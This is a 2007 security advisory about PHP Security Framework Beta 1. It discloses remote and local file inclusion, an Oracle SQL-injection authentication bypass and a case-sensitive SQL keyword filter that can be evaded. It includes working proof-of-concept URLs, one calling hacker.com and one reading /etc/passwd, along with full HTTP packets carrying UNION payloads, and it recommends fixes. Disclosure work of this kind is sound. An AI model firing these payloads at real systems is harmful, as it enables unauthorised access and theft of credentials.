PHP Security Framework: Vuln and Security Bypass

2007-12-1800:00:00

vulners.com

   Title:   PHP Security Framework &#40;Beta 1&#41;
            Multiple Vulnerabilities and Security Bypass

  Vendor:   http://benjilenoob.66ghz.com/projects/

Advisory:   http://acid-root.new.fr/?0:16
  Author:   DarkFig &lt; gmdarkfig &#40;at&#41; gmail &#40;dot&#41; com &gt;

Released on: 2007/12/16
Changelog: 2007/12/16

 Summary:   [HT] Remote File Inclusion
            [MT] SQL Injection
            [MT] SQL Injection Protection Bypass
            [__] Conclusion

  Legend:   L - Low risk         M - Medium risk
            H - High risk        T - Tested

Risk level: High
CVE: ----------

I - REMOTE FILE INCLUSION

The file "lib/base.inc.php" contains the following code:

10| include_once("$MODEL_DIR/FrameworkPage.class.php");
15| include_once("$COMMON_DIR/adodb/adodb-active-record.inc.php");
26| include_once("$DAO_DIR/Administrator.class.php");
35| include_once("$LOGIC_DIR/AdministratorLogic.class.php");

As you can see, all variables aren't sanatized before
being used. So this can lead to RFI if the php directives
allow_url_fopen and allow_url_include are set to On. This
can also lead to LFI if the php directive magic_quotes_gpc
is set to Off.

Proof Of Concept:
http://localhost/PSF/lib/base.inc.php?MODEL_DIR=http://hacker.com/
http://localhost/PSF/lib/base.inc.php?DAO_DIR=/etc/passwd%00

The author shouldn't use variables for the inclusions, the
best way to protect against this type of vulnerability is
to use constants because they can't be registered by
register_globals if they're properly defined (no variables
used).

II - SQL INJECTION

The script supports several server databases, Oracle
included. So the script must also be secured for this type
of server database.

In a recent research that I have done, I found that
60% of the PHP scripts which support Oracle aren't safe !
People think that if they use the function addslashes()
on a string which has quotes, they'll be secured
against SQL Injection. On MySQL that's roughly true, but
on Oracle that's wrong.

The escape character for MySQL is a backslashes, \x92[\].
The escape character for Oracle is a single quote, \x39['].

The script has a user interface for the administrators.
The file "lib/control/AuthentificationController.class.php"
contains the following code:

4| public function __construct()
5| {
6| $FrameworkPage = FrameworkPage::getInstance();
7| $FrameworkPage->setHeadTitle("Authenfication Form");
8| $FrameworkPage->setPageTitle("PHPSecurityFramework");
9|
10| if(isset($_REQUEST['username']) && isset($_REQUEST['password']))
11| $this->Login($_REQUEST['username'], $_REQUEST['password']);
12| }
13|
14| public function Login($username, $password)
15| {
16| $username = addslashes($username);
17| $password = md5($password);
18| $AdministratorLogic = new AdministratorLogic();
19|
20| if($AdministratorLogic->validateAdministrator($username,$password))
22| session_register('psf_admin');

The function addslashes() is applied to $username, after
the function valideAdministrator() is called with two
parameters. This function contains the following code:

10| public function validateAdministrator($username, $password)
11| {
12| if(is_string($username) && is_string($password))
13| {
14| $Admin = new Administrator();
15|
16| if( ($Admin->load("username=?", array($username))) !==false)
17| {
18| if($Admin->md5password==$password)
19| return true;

The code for the Administrator class is situated in the
file "lib/dao/Administrator.class.php":

2| class Administrator extends ADOdb_Active_Record
3| {
4| public $_table = 'psf_administrator';
5| }

The function load() contains this code (situated in
"lib/common/adodb/adodb-active-record.inc.php"):

384| function Load($where,$bindarr=false)
385| {
386| $db =& $this->DB(); if (!$db) return false;
387| $this->_where = $where;
388|
389| $save = $db->SetFetchMode(ADODB_FETCH_NUM);
390| $row = $db->GetRow("select * from ".$this->_table.' WHERE '.$where,$bindarr);
391| $db->SetFetchMode($save);
392|
393| return $this->Set($row);
394| }

I will take an example to explain how it works.
Let's send this HTTP packet:

POST /PSF/index.php?page=authentification HTTP/1.1\r\n
Host: localhost\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 66\r\n\r\n
username=root%27&password=toor&page=authentification&button=Log+in\r\n\r\n

The SQL request will be like this:
select * from psf_administrator WHERE username='root\\\\\\\\\\\\\\\''

If we're on MySQL there's no problem, but if we're on
Oracle, this return an error: ORA-01756: quoted string
not properly terminated. This can be exploited, for
example if you want to bypass the authentification
protection, send the following HTTP packet:

POST /PSF/index.php?page=authentification HTTP/1.1\r\n
Host: localhost\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: <SIZE>\r\n\r\n
username=8%27+union+select+CHR%2856%29%2CCHR%2857%29%2CCHR%2857%29
%2CCHR%2857%29+FROM+psf_administrator-----------&password=9&page=a
uthentification&button=Log+in\r\n\r\n

The SQL request will look's like this:
select * from psf_administrator WHERE username='8\\\\\\\\\\\\\\\'
union select CHR(56),CHR(57),CHR(57),CHR(57) FROM psf_administr
ator-----------'

So the function validateAdministrator() will return TRUE.
The protection will be bypassed, even if magic_quotes_gpc
is enabled. To protect against SQL Injection with quotes
on Oracle servers, we must replace each ' by ''. We can
do that with str_replace() or by enabling the PHP
directive magic_quotes_sybase.

III - SQL INJECTION PROTECTION BYPASS

From the file "lib/common/SecureHttpRequest.class.php":

By seeing this comment and how the function is called, I
know that they'll be a filter against SQL Injections.
Let's see how the string is secured:

105| if(is_string($string_to_parse) and !empty($string_to_parse))
106| {
111| $keywords =
| array('UNION','OUTFILE','DUMPFILE','ORDER','SELECT');
|
112| foreach($keywords as $keyword)
|
113| $string_to_parse =
| str_replace($keyword, "_$keyword", $string_to_parse);
114|
115| return $string_to_parse;
116| }

The str_replace() function is case sensitive, so we can
bypass this protection by using SQL commands with lower
case. In other case the attacker doesn't need these commands
to perform an SQL Injection attack, a filter protection
can't protect completely against this type of attack.
Let's take the example from the file "examples/noQuoteSql
Injection.test.php":

1| Try some UNION and co stuff to display the administrator
| password in the client table
2| <hr>
3| <?php
|
4| // SELECT title, message FROM news WHERE news.id = 1 UNION
| SELECT username, password FROM client WHERE client.id = 1
| INTO OUTFILE 'c:/hacked.txt'
|
5| include_once("…/PHPSecFramework/getsecure.php");
|
6| mysql_connect('localhost', 'root', 'vertrigo');
7| mysql_select_db('hackme');
|
8| $query = mysql_query("SELECT title, message FROM news WHERE
| news.id = " . $_GET['id']);
|
9| $result = mysql_fetch_array($query);
10| print_r($result);
11| ?>

What if we try to send this content:
?id=-1 union select username,password from client limit 1

The protection is bypassed and the SQL Injection is
exploited. If the author wanna apply his filter
completely, he must use the function str_ireplace().

IV - CONCLUSION

The goal of the project is interesting, but how it was
made, can't conduct to its success. For example,
SQL Injections with quotes are protected by doing the
same thing as magic_quotes_gpc, this didn't resolve its
problems.

Before doing something which depends on what the user
has sent, we must analyze all data before using them.

Applying a filter won't be enough, we must code
an algorithm which protects perfectly against each type
of attack, even if we have to replace basic functions.

I hope this advisory will change the way this project
is going on.

JSON